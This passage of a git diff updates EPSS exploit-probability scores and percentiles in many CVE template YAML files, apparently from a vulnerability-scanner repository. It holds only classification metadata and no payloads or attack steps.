verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-6366.yaml b/http/cves/2024/CVE-2024-6366.yaml index 3b3f6ffe4fc..3eb8fcfc0b4 100644 --- a/http/cves/2024/CVE-2024-6366.yaml +++ b/http/cves/2024/CVE-2024-6366.yaml @@ -17,7 +17,7 @@ info: classification: cve-id: CVE-2024-6366 epss-score: 0.91471 - epss-percentile: 0.99648 + epss-percentile: 0.99647 metadata: vendor: cozmoslabs product: user-profile-builder diff --git a/http/cves/2024/CVE-2024-6396.yaml b/http/cves/2024/CVE-2024-6396.yaml index dbcd01de737..9622b22b44b 100644 --- a/http/cves/2024/CVE-2024-6396.yaml +++ b/http/cves/2024/CVE-2024-6396.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2024-6396 cwe-id: CWE-29 epss-score: 0.9083 - epss-percentile: 0.99607 + epss-percentile: 0.99605 cpe: cpe:2.3:a:aimstack:aim:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2024/CVE-2024-6420.yaml b/http/cves/2024/CVE-2024-6420.yaml index e9374cf50e4..126168c6a7c 100644 --- a/http/cves/2024/CVE-2024-6420.yaml +++ b/http/cves/2024/CVE-2024-6420.yaml @@ -19,7 +19,7 @@ info: cvss-score: 8.6 cve-id: CVE-2024-6420 epss-score: 0.29383 - epss-percentile: 0.96454 + epss-percentile: 0.96458 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-6517.yaml b/http/cves/2024/CVE-2024-6517.yaml index 72dc4ef0743..7cfd3072f38 100644 --- a/http/cves/2024/CVE-2024-6517.yaml +++ b/http/cves/2024/CVE-2024-6517.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-6517 cwe-id: CWE-79 epss-score: 0.03016 - epss-percentile: 0.86222 + epss-percentile: 0.86224 cpe: cpe:2.3:a:dotsquares:contact_form_7_math_captcha:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-6555.yaml b/http/cves/2024/CVE-2024-6555.yaml index 880a8003580..15a184a3a8b 100644 --- a/http/cves/2024/CVE-2024-6555.yaml +++ b/http/cves/2024/CVE-2024-6555.yaml @@ -20,7 +20,7 @@ info: cvss-score: 5.3 cve-id: CVE-2024-6555 epss-score: 0.08245 - epss-percentile: 0.91969 + epss-percentile: 0.91965 metadata: verified: true max-requests: 1 diff --git a/http/cves/2024/CVE-2024-6586.yaml b/http/cves/2024/CVE-2024-6586.yaml index b9598474c75..2681b8a9944 100644 --- a/http/cves/2024/CVE-2024-6586.yaml +++ b/http/cves/2024/CVE-2024-6586.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-6586 cwe-id: CWE-201 epss-score: 0.15756 - epss-percentile: 0.94511 + epss-percentile: 0.94509 cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2024/CVE-2024-6646.yaml b/http/cves/2024/CVE-2024-6646.yaml index deca62a21bb..43eb70e837a 100644 --- a/http/cves/2024/CVE-2024-6646.yaml +++ b/http/cves/2024/CVE-2024-6646.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-6646 cwe-id: CWE-200 epss-score: 0.91637 - epss-percentile: 0.9966 + epss-percentile: 0.99659 cpe: cpe:2.3:h:netgear:wn604:*:*:*:*:*:*:*:* metadata: fofa-query: title=="Netgear" diff --git a/http/cves/2024/CVE-2024-6651.yaml b/http/cves/2024/CVE-2024-6651.yaml index 579abd51102..ee59acf1760 100644 --- a/http/cves/2024/CVE-2024-6651.yaml +++ b/http/cves/2024/CVE-2024-6651.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-6651 cwe-id: CWE-79 epss-score: 0.11531 - epss-percentile: 0.93415 + epss-percentile: 0.93409 metadata: max-request: 3 vendor: WordPress diff --git a/http/cves/2024/CVE-2024-6690.yaml b/http/cves/2024/CVE-2024-6690.yaml index dcb0fe6db3b..48a52da56aa 100644 --- a/http/cves/2024/CVE-2024-6690.yaml +++ b/http/cves/2024/CVE-2024-6690.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-6690 cwe-id: CWE-601 epss-score: 0.00152 - epss-percentile: 0.36396 + epss-percentile: 0.36339 cpe: cpe:2.3:a:wp-buy:wp_content_copy_protection_\&_no_right_click:*:*:*:*:pro:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-6746.yaml b/http/cves/2024/CVE-2024-6746.yaml index 470cfe7dedc..59df4ec0bf5 100644 --- a/http/cves/2024/CVE-2024-6746.yaml +++ b/http/cves/2024/CVE-2024-6746.yaml @@ -22,8 +22,8 @@ info: cvss-score: 4.3 cve-id: CVE-2024-6746 cwe-id: CWE-24 - epss-score: 0.82258 - epss-percentile: 0.99184 + epss-score: 0.79744 + epss-percentile: 0.99052 metadata: vendor: naibowang product: easyspider diff --git a/http/cves/2024/CVE-2024-6753.yaml b/http/cves/2024/CVE-2024-6753.yaml index 469937940c8..4f34bd16e19 100644 --- a/http/cves/2024/CVE-2024-6753.yaml +++ b/http/cves/2024/CVE-2024-6753.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2024-6753 cwe-id: CWE-79 - epss-score: 0.07259 - epss-percentile: 0.91374 + epss-score: 0.0473 + epss-percentile: 0.89081 metadata: verified: true max-request: 4 diff --git a/http/cves/2024/CVE-2024-6842.yaml b/http/cves/2024/CVE-2024-6842.yaml index 525977d34a3..ca4c0c3945c 100644 --- a/http/cves/2024/CVE-2024-6842.yaml +++ b/http/cves/2024/CVE-2024-6842.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2024-6842 cwe-id: CWE-200 - epss-score: 0.41811 - epss-percentile: 0.97307 + epss-score: 0.72563 + epss-percentile: 0.9872 metadata: max-request: 1 verified: true diff --git a/http/cves/2024/CVE-2024-6886.yaml b/http/cves/2024/CVE-2024-6886.yaml index ff7aec1c4b3..e258f1669a8 100644 --- a/http/cves/2024/CVE-2024-6886.yaml +++ b/http/cves/2024/CVE-2024-6886.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-6886 cwe-id: CWE-79 epss-score: 0.16577 - epss-percentile: 0.94704 + epss-percentile: 0.94702 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-6892.yaml b/http/cves/2024/CVE-2024-6892.yaml index 1aeadc206f9..e2d5d911605 100644 --- a/http/cves/2024/CVE-2024-6892.yaml +++ b/http/cves/2024/CVE-2024-6892.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-6892 cwe-id: CWE-81,CWE-79 epss-score: 0.04411 - epss-percentile: 0.88675 + epss-percentile: 0.88674 cpe: cpe:2.3:a:journyx:journyx:11.5.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-6922.yaml b/http/cves/2024/CVE-2024-6922.yaml index 27a786cdad9..90658b02407 100644 --- a/http/cves/2024/CVE-2024-6922.yaml +++ b/http/cves/2024/CVE-2024-6922.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-6922 classification: epss-score: 0.35587 - epss-percentile: 0.96935 + epss-percentile: 0.96934 cpe: cpe:2.3:a:automationanywhere:automation_360:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-6926.yaml b/http/cves/2024/CVE-2024-6926.yaml index 40dfbbdb04d..a89221cd51d 100644 --- a/http/cves/2024/CVE-2024-6926.yaml +++ b/http/cves/2024/CVE-2024-6926.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2024-6926 epss-score: 0.65223 - epss-percentile: 0.98416 + epss-percentile: 0.98419 metadata: max-request: 2 vendor: viral-signup diff --git a/http/cves/2024/CVE-2024-7008.yaml b/http/cves/2024/CVE-2024-7008.yaml index 80cd4f3a3f1..e8e5340a4ca 100644 --- a/http/cves/2024/CVE-2024-7008.yaml +++ b/http/cves/2024/CVE-2024-7008.yaml @@ -14,7 +14,7 @@ info: - https://starlabs.sg/advisories/24/24-7008/ classification: epss-score: 0.1358 - epss-percentile: 0.94019 + epss-percentile: 0.94015 metadata: verified: true shodan-query: html:"Calibre" diff --git a/http/cves/2024/CVE-2024-7097.yaml b/http/cves/2024/CVE-2024-7097.yaml index 10ebbfc680d..d09aa9af943 100644 --- a/http/cves/2024/CVE-2024-7097.yaml +++ b/http/cves/2024/CVE-2024-7097.yaml @@ -15,7 +15,7 @@ info: - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/ classification: epss-score: 0.13504 - epss-percentile: 0.94002 + epss-percentile: 0.93998 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-7120.yaml b/http/cves/2024/CVE-2024-7120.yaml index f00c4cb945c..74d19b07e29 100644 --- a/http/cves/2024/CVE-2024-7120.yaml +++ b/http/cves/2024/CVE-2024-7120.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.3 cve-id: CVE-2024-7120 cwe-id: CWE-78 - epss-score: 0.90968 - epss-percentile: 0.99616 + epss-score: 0.92242 + epss-percentile: 0.99704 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-7339.yaml b/http/cves/2024/CVE-2024-7339.yaml index 1aa4540eaec..c7a99147ed5 100644 --- a/http/cves/2024/CVE-2024-7339.yaml +++ b/http/cves/2024/CVE-2024-7339.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-7339 cwe-id: CWE-200 epss-score: 0.89489 - epss-percentile: 0.99531 + epss-percentile: 0.99533 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-7354.yaml b/http/cves/2024/CVE-2024-7354.yaml index 74a093b918c..4c203ed0985 100644 --- a/http/cves/2024/CVE-2024-7354.yaml +++ b/http/cves/2024/CVE-2024-7354.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-7354 cwe-id: CWE-79 epss-score: 0.00868 - epss-percentile: 0.7469 + epss-percentile: 0.74672 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2024/CVE-2024-7399.yaml b/http/cves/2024/CVE-2024-7399.yaml index 6a76e285070..d48d7a88a3c 100644 --- a/http/cves/2024/CVE-2024-7399.yaml +++ b/http/cves/2024/CVE-2024-7399.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2024-7399 cwe-id: CWE-22 epss-score: 0.67522 - epss-percentile: 0.98516 + epss-percentile: 0.98518 cpe: cpe:2.3:a:samsung:magicinfo_9_server:*:*:*:*:*:*:*:* metadata: vendor: samsung diff --git a/http/cves/2024/CVE-2024-7591.yaml b/http/cves/2024/CVE-2024-7591.yaml index 204148f82d8..36e65b1016a 100644 --- a/http/cves/2024/CVE-2024-7591.yaml +++ b/http/cves/2024/CVE-2024-7591.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-7591 cwe-id: CWE-78 epss-score: 0.31458 - epss-percentile: 0.96635 + epss-percentile: 0.96637 cpe: cpe:2.3:a:kemptechnologies:loadmaster:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-7593.yaml b/http/cves/2024/CVE-2024-7593.yaml index 3ed097093b9..133939f8afc 100644 --- a/http/cves/2024/CVE-2024-7593.yaml +++ b/http/cves/2024/CVE-2024-7593.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-7593 cwe-id: CWE-287 epss-score: 0.94436 - epss-percentile: 0.99986 + epss-percentile: 0.99984 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-7714.yaml b/http/cves/2024/CVE-2024-7714.yaml index 053f73bad3e..8cef1ad9577 100644 --- a/http/cves/2024/CVE-2024-7714.yaml +++ b/http/cves/2024/CVE-2024-7714.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-7714 cwe-id: CWE-284 epss-score: 0.23886 - epss-percentile: 0.95843 + epss-percentile: 0.95847 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-7786.yaml b/http/cves/2024/CVE-2024-7786.yaml index a95572cf5fe..6411c77ccc6 100755 --- a/http/cves/2024/CVE-2024-7786.yaml +++ b/http/cves/2024/CVE-2024-7786.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2024-7786 epss-score: 0.65504 - epss-percentile: 0.98431 + epss-percentile: 0.98433 metadata: max-request: 2 verified: true diff --git a/http/cves/2024/CVE-2024-7854.yaml b/http/cves/2024/CVE-2024-7854.yaml index c2a46d8f479..9d8cae708f2 100644 --- a/http/cves/2024/CVE-2024-7854.yaml +++ b/http/cves/2024/CVE-2024-7854.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-7854 cwe-id: CWE-89 epss-score: 0.8034 - epss-percentile: 0.9908 + epss-percentile: 0.99082 cpe: cpe:2.3:a:sjhoo:woo_inquiry:0.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-7928.yaml b/http/cves/2024/CVE-2024-7928.yaml index 1337c589b68..310535eb731 100644 --- a/http/cves/2024/CVE-2024-7928.yaml +++ b/http/cves/2024/CVE-2024-7928.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-7928 cwe-id: CWE-22 epss-score: 0.92925 - epss-percentile: 0.99763 + epss-percentile: 0.99762 cpe: cpe:2.3:a:fastadmin:fastadmin:1.3.3.20220121:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2024/CVE-2024-8021.yaml b/http/cves/2024/CVE-2024-8021.yaml index c799fb4b5ee..c3aed70eb77 100644 --- a/http/cves/2024/CVE-2024-8021.yaml +++ b/http/cves/2024/CVE-2024-8021.yaml @@ -14,7 +14,7 @@ info: - https://huntr.com/bounties/adc23067-ec04-47ef-9265-afd452071888 classification: epss-score: 0.02682 - epss-percentile: 0.8543 + epss-percentile: 0.85427 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-8484.yaml b/http/cves/2024/CVE-2024-8484.yaml index 819dfb206ec..4057e91a019 100644 --- a/http/cves/2024/CVE-2024-8484.yaml +++ b/http/cves/2024/CVE-2024-8484.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-8484 cwe-id: CWE-89 epss-score: 0.86607 - epss-percentile: 0.99392 + epss-percentile: 0.99395 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-8517.yaml b/http/cves/2024/CVE-2024-8517.yaml index a5876d56af8..23e935323b2 100644 --- a/http/cves/2024/CVE-2024-8517.yaml +++ b/http/cves/2024/CVE-2024-8517.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-8517 cwe-id: CWE-646 epss-score: 0.93228 - epss-percentile: 0.99789 + epss-percentile: 0.99788 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-8522.yaml b/http/cves/2024/CVE-2024-8522.yaml index 6ce2fc9566a..041b9400f20 100644 --- a/http/cves/2024/CVE-2024-8522.yaml +++ b/http/cves/2024/CVE-2024-8522.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-8522 cwe-id: CWE-89 epss-score: 0.86508 - epss-percentile: 0.99389 + epss-percentile: 0.99391 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 4 diff --git a/http/cves/2024/CVE-2024-8529.yaml b/http/cves/2024/CVE-2024-8529.yaml index c4b85ede308..69664e6b842 100644 --- a/http/cves/2024/CVE-2024-8529.yaml +++ b/http/cves/2024/CVE-2024-8529.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-8529 cwe-id: CWE-89 epss-score: 0.66954 - epss-percentile: 0.98494 + epss-percentile: 0.98496 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2024/CVE-2024-8698.yaml b/http/cves/2024/CVE-2024-8698.yaml index 4bbe720dfd9..74c93c7bafc 100644 --- a/http/cves/2024/CVE-2024-8698.yaml +++ b/http/cves/2024/CVE-2024-8698.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-8698 cwe-id: CWE-347 epss-score: 0.80217 - epss-percentile: 0.99075 + epss-percentile: 0.99077 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-8752.yaml b/http/cves/2024/CVE-2024-8752.yaml index d27f02de07c..3b5bc5e33f3 100644 --- a/http/cves/2024/CVE-2024-8752.yaml +++ b/http/cves/2024/CVE-2024-8752.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2024-8752 epss-score: 0.90862 - epss-percentile: 0.99609 + epss-percentile: 0.99607 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-8856.yaml b/http/cves/2024/CVE-2024-8856.yaml index 76825ad8e81..66309d9ed09 100644 --- a/http/cves/2024/CVE-2024-8856.yaml +++ b/http/cves/2024/CVE-2024-8856.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2024-8856 cwe-id: CWE-434 epss-score: 0.9295 - epss-percentile: 0.99765 + epss-percentile: 0.99764 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-8859.yaml b/http/cves/2024/CVE-2024-8859.yaml index db8f89112e8..75feaf006c8 100644 --- a/http/cves/2024/CVE-2024-8859.yaml +++ b/http/cves/2024/CVE-2024-8859.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-8859 classification: epss-score: 0.16065 - epss-percentile: 0.94571 + epss-percentile: 0.94569 metadata: max-request: 7 vendor: lfprojects diff --git a/http/cves/2024/CVE-2024-8877.yaml b/http/cves/2024/CVE-2024-8877.yaml index 7d1da7f29db..17933c15e73 100644 --- a/http/cves/2024/CVE-2024-8877.yaml +++ b/http/cves/2024/CVE-2024-8877.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-8877 cwe-id: CWE-89 - epss-score: 0.82236 - epss-percentile: 0.99182 + epss-score: 0.84582 + epss-percentile: 0.99297 cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-8883.yaml b/http/cves/2024/CVE-2024-8883.yaml index 42d41e38c60..eb11b3999ed 100644 --- a/http/cves/2024/CVE-2024-8883.yaml +++ b/http/cves/2024/CVE-2024-8883.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.8 cve-id: CVE-2024-8883 cwe-id: CWE-601 - epss-score: 0.0339 - epss-percentile: 0.87055 + epss-score: 0.0305 + epss-percentile: 0.86295 metadata: max-request: 1 verified: true diff --git a/http/cves/2024/CVE-2024-9007.yaml b/http/cves/2024/CVE-2024-9007.yaml index ac47f7fcaf8..01d9c7d78e4 100644 --- a/http/cves/2024/CVE-2024-9007.yaml +++ b/http/cves/2024/CVE-2024-9007.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-9007 classification: epss-score: 0.03711 - epss-percentile: 0.87617 + epss-percentile: 0.87619 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-9007 diff --git a/http/cves/2024/CVE-2024-9047.yaml b/http/cves/2024/CVE-2024-9047.yaml index ce9c594ef9a..a1aab5db31a 100644 --- a/http/cves/2024/CVE-2024-9047.yaml +++ b/http/cves/2024/CVE-2024-9047.yaml @@ -23,8 +23,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-9047 cwe-id: CWE-22 - epss-score: 0.93781 - epss-percentile: 0.99846 + epss-score: 0.93618 + epss-percentile: 0.99827 metadata: max-request: 1 vendor: nickolas_bossinas diff --git a/http/cves/2024/CVE-2024-9161.yaml b/http/cves/2024/CVE-2024-9161.yaml index c9a3069d4fd..2b120414814 100644 --- a/http/cves/2024/CVE-2024-9161.yaml +++ b/http/cves/2024/CVE-2024-9161.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-9161 cwe-id: CWE-862 epss-score: 0.22013 - epss-percentile: 0.95591 + epss-percentile: 0.95595 cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-9166.yaml b/http/cves/2024/CVE-2024-9166.yaml index c9c21425791..c391487c3b7 100644 --- a/http/cves/2024/CVE-2024-9166.yaml +++ b/http/cves/2024/CVE-2024-9166.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-9166 cwe-id: CWE-78 epss-score: 0.04578 - epss-percentile: 0.88886 + epss-percentile: 0.88884 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-9186.yaml b/http/cves/2024/CVE-2024-9186.yaml index 570f0933519..ef06a85090f 100644 --- a/http/cves/2024/CVE-2024-9186.yaml +++ b/http/cves/2024/CVE-2024-9186.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-89 cve-id: CVE-2024-9186 epss-score: 0.21731 - epss-percentile: 0.95563 + epss-percentile: 0.95566 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-9463.yaml b/http/cves/2024/CVE-2024-9463.yaml index aa6d64206d4..ebf4e75438e 100644 --- a/http/cves/2024/CVE-2024-9463.yaml +++ b/http/cves/2024/CVE-2024-9463.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-9463 cwe-id: CWE-78 epss-score: 0.94199 - epss-percentile: 0.99916 + epss-percentile: 0.99915 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-9474.yaml b/http/cves/2024/CVE-2024-9474.yaml index 9129d4961f7..1730ba80a8b 100644 --- a/http/cves/2024/CVE-2024-9474.yaml +++ b/http/cves/2024/CVE-2024-9474.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2024-9474 cwe-id: CWE-78 epss-score: 0.94184 - epss-percentile: 0.99915 + epss-percentile: 0.99913 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-9772.yaml b/http/cves/2024/CVE-2024-9772.yaml index 5f9a44bd74d..9aa6bbd3a14 100644 --- a/http/cves/2024/CVE-2024-9772.yaml +++ b/http/cves/2024/CVE-2024-9772.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-9772 cwe-id: CWE-94 epss-score: 0.07975 - epss-percentile: 0.91816 + epss-percentile: 0.91813 cpe: cpe:2.3:a:uiux:uix_shortcodes:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-9989.yaml b/http/cves/2024/CVE-2024-9989.yaml index 4f8f25df0c4..72e2c39d529 100644 --- a/http/cves/2024/CVE-2024-9989.yaml +++ b/http/cves/2024/CVE-2024-9989.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-9989 cwe-id: CWE-288 epss-score: 0.92504 - epss-percentile: 0.99724 + epss-percentile: 0.99723 cpe: cpe:2.3:a:odude:crypto_tool:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-0107.yaml b/http/cves/2025/CVE-2025-0107.yaml index fad9112cf40..203c9ca91cb 100644 --- a/http/cves/2025/CVE-2025-0107.yaml +++ b/http/cves/2025/CVE-2025-0107.yaml @@ -18,7 +18,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 epss-score: 0.32774 - epss-percentile: 0.96737 + epss-percentile: 0.96738 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-0108.yaml b/http/cves/2025/CVE-2025-0108.yaml index 03d9620d509..8759f8c861f 100644 --- a/http/cves/2025/CVE-2025-0108.yaml +++ b/http/cves/2025/CVE-2025-0108.yaml @@ -13,8 +13,8 @@ info: reference: - https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/ classification: - epss-score: 0.94007 - epss-percentile: 0.99887 + epss-score: 0.94071 + epss-percentile: 0.99897 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cve-id: CVE-2025-0108 diff --git a/http/cves/2025/CVE-2025-0133.yaml b/http/cves/2025/CVE-2025-0133.yaml index 8bca9580cf7..aa72b61f759 100644 --- a/http/cves/2025/CVE-2025-0133.yaml +++ b/http/cves/2025/CVE-2025-0133.yaml @@ -15,7 +15,7 @@ info: - https://hackerone.com/reports/3096384 classification: epss-score: 0.0596 - epss-percentile: 0.90378 + epss-percentile: 0.9038 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-0674.yaml b/http/cves/2025/CVE-2025-0674.yaml index dddf654b6f3..03ad852abda 100644 --- a/http/cves/2025/CVE-2025-0674.yaml +++ b/http/cves/2025/CVE-2025-0674.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-0674 cwe-id: CWE-288 epss-score: 0.45032 - epss-percentile: 0.9748 + epss-percentile: 0.97476 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-0868.yaml b/http/cves/2025/CVE-2025-0868.yaml index 3feebfafcf3..e767165de53 100644 --- a/http/cves/2025/CVE-2025-0868.yaml +++ b/http/cves/2025/CVE-2025-0868.yaml @@ -16,7 +16,7 @@ info: - https://github.com/arc53/DocsGPT classification: epss-score: 0.11125 - epss-percentile: 0.93249 + epss-percentile: 0.93243 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-10210.yaml b/http/cves/2025/CVE-2025-10210.yaml index 290313d35be..ecf98fc34fe 100644 --- a/http/cves/2025/CVE-2025-10210.yaml +++ b/http/cves/2025/CVE-2025-10210.yaml @@ -20,7 +20,7 @@ info: cvss-score: 6.3 cve-id: CVE-2025-10210 epss-score: 0.01191 - epss-percentile: 0.78413 + epss-percentile: 0.78408 cwe-id: CWE-89 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-10211.yaml b/http/cves/2025/CVE-2025-10211.yaml index 4de05096fda..dbca3d03134 100644 --- a/http/cves/2025/CVE-2025-10211.yaml +++ b/http/cves/2025/CVE-2025-10211.yaml @@ -18,7 +18,7 @@ info: cvss-score: 6.3 cve-id: CVE-2025-10211 epss-score: 0.06264 - epss-percentile: 0.90633 + epss-percentile: 0.90634 cwe-id: CWE-918 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-1023.yaml b/http/cves/2025/CVE-2025-1023.yaml index 06d642c7091..57172d59d46 100644 --- a/http/cves/2025/CVE-2025-1023.yaml +++ b/http/cves/2025/CVE-2025-1023.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-1023 cwe-id: CWE-89 epss-score: 0.00926 - epss-percentile: 0.75572 + epss-percentile: 0.75563 cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-1035.yaml b/http/cves/2025/CVE-2025-1035.yaml index 2919a10dcd5..da1d281c1b9 100644 --- a/http/cves/2025/CVE-2025-1035.yaml +++ b/http/cves/2025/CVE-2025-1035.yaml @@ -15,8 +15,8 @@ info: - https://www.usom.gov.tr/bildirim/tr-25-0037 - https://www.cve.org/CVERecord?id=CVE-2025-1035 classification: - epss-score: 0.23682 - epss-percentile: 0.95814 + epss-score: 0.21153 + epss-percentile: 0.95481 cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.7 cve-id: CVE-2025-1035 diff --git a/http/cves/2025/CVE-2025-1097.yaml b/http/cves/2025/CVE-2025-1097.yaml index 1483829ec15..b88e2f355c8 100644 --- a/http/cves/2025/CVE-2025-1097.yaml +++ b/http/cves/2025/CVE-2025-1097.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2025-1097 cwe-id: CWE-20 - epss-score: 0.13418 - epss-percentile: 0.93978 + epss-score: 0.17194 + epss-percentile: 0.94802 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-1098.yaml b/http/cves/2025/CVE-2025-1098.yaml index 36466c59013..4c4c7e3e53b 100644 --- a/http/cves/2025/CVE-2025-1098.yaml +++ b/http/cves/2025/CVE-2025-1098.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2025-1098 cwe-id: CWE-20 - epss-score: 0.44775 - epss-percentile: 0.97465 + epss-score: 0.51306 + epss-percentile: 0.97787 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-11307.yaml b/http/cves/2025/CVE-2025-11307.yaml index 8b212d46676..b08b1389780 100644 --- a/http/cves/2025/CVE-2025-11307.yaml +++ b/http/cves/2025/CVE-2025-11307.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2025-11307 - epss-score: 0.05088 - epss-percentile: 0.89498 + epss-score: 0.05814 + epss-percentile: 0.90239 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-11371.yaml b/http/cves/2025/CVE-2025-11371.yaml index 6b21c4e579a..560c9009781 100644 --- a/http/cves/2025/CVE-2025-11371.yaml +++ b/http/cves/2025/CVE-2025-11371.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2025-11371 cwe-id: CWE-552 epss-score: 0.66002 - epss-percentile: 0.98453 + epss-percentile: 0.98456 metadata: verified: true max-request: 1 diff --git 